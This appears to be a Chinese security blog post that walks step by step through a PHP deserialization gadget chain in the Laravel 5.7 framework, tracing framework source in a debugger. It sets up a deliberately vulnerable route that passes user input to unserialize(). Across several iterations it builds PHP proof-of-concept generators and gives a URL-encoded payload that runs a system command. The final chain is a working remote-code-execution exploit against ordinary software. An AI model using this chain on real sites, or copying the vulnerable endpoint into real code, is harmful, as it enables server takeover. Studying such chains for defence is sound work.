简介:
和yii一样,Laravel也是一套简洁、优雅的PHPWeb开发框架(PHP Web Framework)。
环境部署:
下载源码:
https://github.com/laravel/laravel/tree/5.7
然后就是构造一个反序列化的利用点了,在routes/web.php里面加一条路由:
Route::get('/unserialize',"UnserializeController@uns"); //类名@方法名
在App\Http\Controllers下面写一个控制器UnserializeController.php文件:
<?php
namespace App\Http\Controllers;
class UnserializeController extends Controller
{
public function uns(){
if(isset($_GET['c'])){
unserialize($_GET['c']);
}else{
highlight_file(__FILE__);
}
return "uns";
}
}
反序列化链分析:
漏洞链的起点在vendor\laravel\framework\src\Illuminate\Foundation\Testing\PendingCommand.php,与5.6相比,5.7多了一个PendingCommand.php文件。
看一下这个新增的类,发现有一个__destruct()
$this->hasExecuted默认是false的,所以可以直接进入run方法:
要想执行到异常处理代码$exitCode = $this->app[Kernel::class]->call($this->command, $this->parameters);中得先经过 $this->mockConsoleOutput():
一堆看不懂的代码,来个poc试试:
<?php
namespace Illuminate\Foundation\Testing{
class PendingCommand
{
protected $command;
protected $parameters;
public function __construct(){
$this->command="system";
$this->parameters[]="dir";
}
}
}
namespace{
use Illuminate\Foundation\Testing\PendingCommand;
echo urlencode(serialize(new PendingCommand()));
}
生成payload,然后传值过去:
http://127.0.0.1/laravel-5.7/public/index.php/unserialize?c=O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A3%3A%22dir%22%3B%7D%7D
报错了:
打一下断点,发现是mockConsoleOutput()方法中的createABufferedOutputMock()函数:
foreach ($this->test->expectedOutput as $i => $output) {
报错的原因就是因为$this->test没有expectedOutput这个属性。跟进一下这个属性,发现这个属性在trait InteractsWithConsole中,trait类我们没法实例化,此外就只有一些测试类有这个属性,因此这里就卡住了。这时候想到利用__get方法
大师傅们经过寻找,选择了Illuminate\Auth\GenericUser类:
在这里对类的加载有个疑问,后来在一篇文章中找到了:
attributes是可控的,因此直接构造即可。
而且,会发现mockConsoleOutput()方法中也有类似的代码:
foreach ($this->test->expectedQuestions as $i => $question) {
因此构造:
<?php
namespace Illuminate\Foundation\Testing{
use Illuminate\Auth\GenericUser;
class PendingCommand
{
protected $command;
protected $parameters;
public $test;
public function __construct(){
$this->command="system";
$this->parameters[]="dir";
$this->test=new GenericUser();
}
}
}
namespace Illuminate\Auth{
class GenericUser
{
protected $attributes;
public function __construct(){
$this->attributes['expectedOutput']=['hello','world'];
$this->attributes['expectedQuestions']=['hello','world'];
}
}
}
namespace{
use Illuminate\Foundation\Testing\PendingCommand;
echo urlencode(serialize(new PendingCommand()));
}
还是报错:
“Call to a member function bind() on null”
意思是在null上调用成员函数bind()
原因应该是没有构造$this->app,看一下app:
继续构造:
<?php
namespace Illuminate\Foundation\Testing{
use Illuminate\Auth\GenericUser;
use Illuminate\Foundation\Application;
class PendingCommand
{
protected $command;
protected $parameters;
public $test;
protected $app;
public function __construct(){
$this->command="system";
$this->parameters[]="dir";
$this->test=new GenericUser();
$this->app=new Application();
}
}
}
namespace Illuminate\Foundation{
class Application{
}
}
namespace Illuminate\Auth{
class GenericUser
{
protected $attributes;
public function __construct(){
$this->attributes['expectedOutput']=['hello','world'];
$this->attributes['expectedQuestions']=['hello','world'];
}
}
}
namespace{
use Illuminate\Foundation\Testing\PendingCommand;
echo urlencode(serialize(new PendingCommand()));
}
继续报错:
Target [Illuminate\Contracts\Console\Kernel] is not instantiable
此时就到了这条链上最困难的点:
Kernel::class是完全限定名称,返回的是一个类的完整的带上命名空间的类名,在laravel这里是Illuminate\Contracts\Console\Kernel。
打断点跟进:
跟进到父类的make():
跟进到resolve():
protected function resolve($abstract, $parameters = [])
{
$abstract = $this->getAlias($abstract);
$needsContextualBuild = ! empty($parameters) || ! is_null(
$this->getContextualConcrete($abstract)
);
if (isset($this->instances[$abstract]) && ! $needsContextualBuild) {
return $this->instances[$abstract];
}
$this->with[] = $parameters;
$concrete = $this->getConcrete($abstract);
if ($this->isBuildable($concrete, $abstract)) {
$object = $this->build($concrete);
} else {
$object = $this->make($concrete);
}
foreach ($this->getExtenders($abstract) as $extender) {
$object = $extender($object, $this);
}
if ($this->isShared($abstract) && ! $needsContextualBuild) {
$this->instances[$abstract] = $object;
}
$this->fireResolvingCallbacks($abstract, $object);
$this->resolved[$abstract] = true;
array_pop($this->with);
return $object;
}
可以看到最终会返回一个object,我们是要调用这个object的call方法来执行命令,全局查找一下,这个执行命令的call方法到底在哪个类:
发现在container类里,而构造的app的类是Application类,这个类正好也是container类的子类,所以最终返回这个Application的实例就可以了。
再来看一下resolve()方法的代码:
$concrete = $this->getConcrete($abstract);
protected function getConcrete($abstract)
{
if (! is_null($concrete = $this->getContextualConcrete($abstract))) {
return $concrete;
}
// If we don't have a registered resolver or concrete for the type, we'll just
// assume each type is a concrete name and will attempt to resolve it as is
// since the container should be able to resolve concretes automatically.
if (isset($this->bindings[$abstract])) {
return $this->bindings[$abstract]['concrete'];
}
return $abstract;
}
第一个if成立不了,主要看第二个if,因为bindings是container的属性,而这里的$this其实就是我们传的app,app的类正好是container的子类,所以bindings的属性同样可控,因此getConcrete()函数的返回值是我们可控的。
getConcrete()函数之后是这个:
if ($this->isBuildable($concrete, $abstract)) {
$object = $this->build($concrete);
} else {
$object = $this->make($concrete);
}
protected function isBuildable($concrete, $abstract)
{
return $concrete === $abstract || $concrete instanceof Closure;
}
这里的$concrete是我们可控的,而$abstract是Illuminate\Contracts\Console\Kernel。经过打断点测试,$this->build($concrete)得到的结果基本就是最终这个get the value of offset返回的了,因此要想办法让$concrete是Illuminate\Foundation\Application,先来看一下大佬们的poc:
<?php
namespace Illuminate\Foundation\Testing{
use Illuminate\Auth\GenericUser;
use Illuminate\Foundation\Application;
class PendingCommand
{
protected $command;
protected $parameters;
public $test;
protected $app;
public function __construct(){
$this->command="system";
$this->parameters[]="dir";
$this->test=new GenericUser();
$this->app=new Application();
}
}
}
namespace Illuminate\Foundation{
class Application{
protected $bindings = [];
public function __construct(){
$this->bindings=array(
'Illuminate\Contracts\Console\Kernel'=>array(
'concrete'=>'Illuminate\Foundation\Application'
)
);
}
}
}
namespace Illuminate\Auth{
class GenericUser
{
protected $attributes;
public function __construct(){
$this->attributes['expectedOutput']=['hello','world'];
$this->attributes['expectedQuestions']=['hello','world'];
}
}
}
namespace{
use Illuminate\Foundation\Testing\PendingCommand;
echo urlencode(serialize(new PendingCommand()));
}
这样到了
if ($this->isBuildable($concrete, $abstract)) {
$object = $this->build($concrete);
} else {
$object = $this->make($concrete);
}
的时候,$concrete是Illuminate\Foundation\Application,$abstract是Illuminate\Contracts\Console\Kernel,无法isBuildable,还会再进入一次make,不过这次make中的$concrete就是我们构造的了。进入make,然后再进入resolve,再进入getConcrete()方法:
if (isset($this->bindings[$abstract])) {
return $this->bindings[$abstract]['concrete'];
}
return $abstract;
不存在$this->bindings[‘Illuminate\Foundation\Application’],所以会直接return Illuminate\Foundation\Application,这样$abstract也是Illuminate\Foundation\Application了,最终$this->app[Kernel::class]返回的就是实例化的Illuminate\Foundation\Application类了。然后开始调用call方法,最终成功执行命令:
参考链接:https://blog.csdn.net/rfrder/article/details/113826483
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。